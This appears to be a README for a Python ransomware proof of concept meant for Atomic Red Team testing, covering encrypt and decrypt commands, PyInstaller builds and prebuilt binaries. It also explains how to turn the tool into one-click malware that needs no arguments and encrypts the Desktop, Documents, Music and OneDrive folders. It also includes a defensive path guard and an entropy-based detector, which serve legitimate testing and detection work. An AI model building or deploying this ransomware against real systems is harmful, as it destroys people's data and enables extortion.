A simple, pure-Python ransomware PoC using AES-CTR and RSA. Supports Windows, Linux and macOS.
A simple Python ransomware PoC that can be used for Atomic Red Team, ATT&CK Technique: Data Encrypted for Impact (T1486). The project is built on CryptSky and full credit goes to deadPix3l for his code. The updated code demonstrates a typical ransomware flow (a per-run symmetric key encrypts file contents in AES-CTR, and RSA protects that key) and is just one of many ways to perform ransomware encryption.
TLDR:
Warning: Be extra careful when running the program, as it will modify files in place. Make sure the path is correct, and be wary of running it with administrative privileges, since the default mode walks the user profile directories.
There are two versions:
Version 1: main.py
Version 2: main_v2.py
Install dependencies:
pip3 install pycryptodome
Default:
Encrypt: python3 main.py -e or python3 main_v2.py -e
Decrypt: python3 main.py -d or python3 main_v2.py -d
Windows with specific path:
Encrypt: python3 main_v2.py -p "C:\users\jimmy\desktop\test_ransomware" -e
Decrypt: python3 main_v2.py -p "C:\users\jimmy\desktop\test_ransomware" -d
Linux/macOS with specific path:
Encrypt: python3 main_v2.py -p "/home/jimmy/test_ransomware" -e
Decrypt: python3 main_v2.py -p "/home/jimmy/test_ransomware" -d
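Because the -p path is the only thing standing between a test run and a real one, a guard that refuses unsafe targets and a dry run that lists what would be touched are worth having before the first encrypt run. The following is an added example, not code from this project or from CryptSky: it resolves symlinks, refuses the filesystem root and the user's home directory, requires the target to sit inside an explicitly allowed base, and requires a marker file (the name .ransomware_poc_test is an assumption of this example) to be present before anything is enumerated.

```python
import os
import sys

# Hypothetical marker file name (an assumption of this example, not part of the
# project): the test directory must contain this empty file before it is touched.
MARKER_FILE = ".ransomware_poc_test"


def validate_target_root(path: str, allowed_base: str) -> str:
    """Return the resolved path if it is a safe PoC target, else raise ValueError.

    Rejects the filesystem root, the current user's home directory, anything
    outside ``allowed_base`` (symlinks are resolved first so a link cannot point
    the walk elsewhere), and directories that lack the marker file.
    """
    resolved = os.path.realpath(path)
    base = os.path.realpath(allowed_base)
    home = os.path.realpath(os.path.expanduser("~"))

    if resolved == os.path.abspath(os.sep) or resolved == home:
        raise ValueError(f"refusing to operate on {resolved!r}")
    if os.path.commonpath([resolved, base]) != base:
        raise ValueError(f"{resolved!r} is outside the allowed base {base!r}")
    if not os.path.isfile(os.path.join(resolved, MARKER_FILE)):
        raise ValueError(f"{resolved!r} has no {MARKER_FILE} marker; refusing")
    return resolved


def list_targets(root: str, allowed_base: str) -> list:
    """Dry run: return the files an encrypt run would touch, modifying nothing.

    Symlinked directories are not followed and symlinked files are skipped, so a
    stray link inside the test folder cannot drag files from elsewhere into the run.
    """
    root = validate_target_root(root, allowed_base)
    targets = []
    for dirpath, _dirnames, filenames in os.walk(root, followlinks=False):
        for name in filenames:
            full = os.path.join(dirpath, name)
            if name == MARKER_FILE or os.path.islink(full):
                continue
            targets.append(full)
    return sorted(targets)


if __name__ == "__main__":
    # Usage: python3 guard.py /home/jimmy/test_ransomware
    target = sys.argv[1] if len(sys.argv) > 1 else os.getcwd()
    for f in list_targets(target, target):
        print(f)
```

Run the dry run first with the same path you intend to pass to -p; if the listing is not exactly the files you expect to lose, stop there. The marker-file requirement means a typo such as a missing trailing directory component fails closed instead of encrypting the parent.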
Variables to change:
NB: As this is simply a PoC for Atomic Red Team, there is no real need to change the keys or other variables.
Tested with Python 2.7 and PyInstaller 3.6, and with Python 3.7 and PyInstaller 4.0. Please note that Python 3.8 with PyInstaller 4.0 has known issues and was found to be incompatible on macOS.
Windows and Linux:
pip3 install pyinstaller
pyinstaller --onefile main_v2.py or py -m PyInstaller --onefile main_v2.py
macOS:
(python 3.7)
python3 -m pip install pyinstaller
pyinstaller --onefile main_v2.py
(python 2.7)
pip install -I pyinstaller==3.6
python -m PyInstaller --onefile main_v2.py
See the /bin folder for prebuilt binaries.
Windows with specific path:
Encrypt: main_v2.exe -p "C:\users\jimmy\desktop\test_ransomware" -e
Decrypt: main_v2.exe -p "C:\users\jimmy\desktop\test_ransomware" -d
Linux with specific path:
Encrypt: ./main_v2 -p "/home/jimmy/test_ransomware" -e
Decrypt: ./main_v2 -p "/home/jimmy/test_ransomware" -d
macOS with specific path:
Encrypt: ./main_v2_macos_py2 -p "/Users/jimmy/test_ransomware" -e
Decrypt: ./main_v2_macos_py2 -p "/Users/jimmy/test_ransomware" -d
The command-line arguments were added to prevent accidental clicks from encrypting anything. To simulate one-click malware that runs with no arguments, comment out the argument-parsing block and uncomment the hard-coded values:
Comment out:
if len(sys.argv) <= 1:
    print('[*] Ransomware - PoC\n')
    # banner()
    print('Usage: python3 main.py -h')
    print('{} -h for help.'.format(sys.argv[0]))
    exit(0)
# Parse arguments
args = parse_args()
encrypt = args.encrypt
decrypt = args.decrypt
absolute_path = str(args.path)
Uncomment:
# absolute_path = "None"   # the string "None" mirrors str(args.path) when -p is omitted, so the default directories are used
# encrypt = True
# decrypt = False
Multiple default paths are supported; add them to startdirs like this (this is the Windows list, built from USERPROFILE; list each directory only once, since a second pass over an already-encrypted tree is not what the test is meant to exercise):
import os

startdirs = [os.environ['USERPROFILE'] + '\\Desktop',
             os.environ['USERPROFILE'] + '\\Documents',
             os.environ['USERPROFILE'] + '\\Music',
             os.environ['USERPROFILE'] + '\\Onedrive']
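An Atomic Red Team run of T1486 is only useful if something on the blue side notices it. One cheap check a detection engineer can validate against this PoC is byte entropy: AES-CTR output is indistinguishable from random bytes and sits near 8 bits per byte, while documents and source files sit far lower. The following is an added example, not code from this project; the 7.5 bits/byte threshold, the 256-byte minimum sample and the sample inputs (a constructed plaintext and a seeded PRNG blob standing in for ciphertext) are all assumptions of this example.

```python
import math
import random
from collections import Counter

# Assumed thresholds for this example. AES-CTR output is indistinguishable from
# random bytes, so its entropy sits near 8 bits/byte; text and most office
# documents sit well below. Very small files cannot be judged reliably.
ENTROPY_THRESHOLD = 7.5
MIN_SAMPLE = 256


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for empty or constant input, 8.0 max."""
    if not data:
        return 0.0
    n = len(data)
    counts = Counter(data)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())


def looks_encrypted(data: bytes) -> bool:
    """Heuristic verdict: large enough to judge and near-maximal entropy."""
    return len(data) >= MIN_SAMPLE and shannon_entropy(data) >= ENTROPY_THRESHOLD


def scan_samples(samples: dict) -> dict:
    """Map file name -> (entropy, flagged) for a dict of in-memory file contents."""
    return {name: (round(shannon_entropy(blob), 3), looks_encrypted(blob))
            for name, blob in samples.items()}


# Constructed sample inputs (not real files): a plaintext document, and a blob
# from a seeded PRNG that stands in for AES-CTR ciphertext of the same file.
PLAINTEXT = (b"Quarterly report: revenue grew 12% year over year. "
             b"Headcount increased in engineering and support. ") * 40
_rng = random.Random(1486)
CIPHERTEXT_LIKE = bytes(_rng.getrandbits(8) for _ in range(4096))

SAMPLES = {"report.txt": PLAINTEXT, "report.txt.enc": CIPHERTEXT_LIKE}

if __name__ == "__main__":
    for name, (h, flagged) in scan_samples(SAMPLES).items():
        print(f"{name:16s} entropy={h:.3f} {'ENCRYPTED?' if flagged else 'ok'}")
```

Entropy alone is a weak signal: compressed archives, images and already-encrypted containers also score near 8 bits/byte, so in a real detection this is combined with a burst of same-extension renames or a high rate of file modifications from one process within a short window. Running the PoC against a test folder and feeding before/after copies of the files through this check is a quick way to confirm that at least the content-level signal is present.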